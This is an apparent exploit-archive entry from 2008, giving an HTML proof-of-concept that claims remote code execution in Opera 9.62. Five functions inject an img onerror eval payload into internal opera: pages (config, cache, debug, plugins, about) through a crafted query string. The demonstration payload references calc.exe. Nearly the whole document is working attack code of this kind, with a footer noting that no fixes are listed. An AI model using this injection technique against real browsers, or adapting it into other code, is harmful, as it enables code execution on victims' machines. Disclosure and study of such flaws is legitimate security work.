Opera 9.62 (opera:allinone) Remote Code Execution Exploit PoC

2008-10-30 05:01:03

<!--
# OPERA 9.62 Remote Code Execution
# Vulnerability Found By NeoCoderz
# Email : NeoCoderz1[at]msn[dot]com
-->
<html>
<script>
function execcalc() {
var abc="c:\\\\windows\\\\system32\\\\calc.exe";
window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalc()">Click me...(opera:config)</a><br>
<script>
function execcalca() {
var abc="c:\\\\windows\\\\system32\\\\calc.exe";
window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br>
<script>
function execcalcb() {
var abc="c:\\\\windows\\\\system32\\\\calc.exe";
window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br>
<script>
function execcalcc() {
var abc="c:\\\\windows\\\\system32\\\\calc.exe";
window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br>
<script>
function execcalcd() {
var abc="c:\\\\windows\\\\system32\\\\calc.exe";
window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br>
</html>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.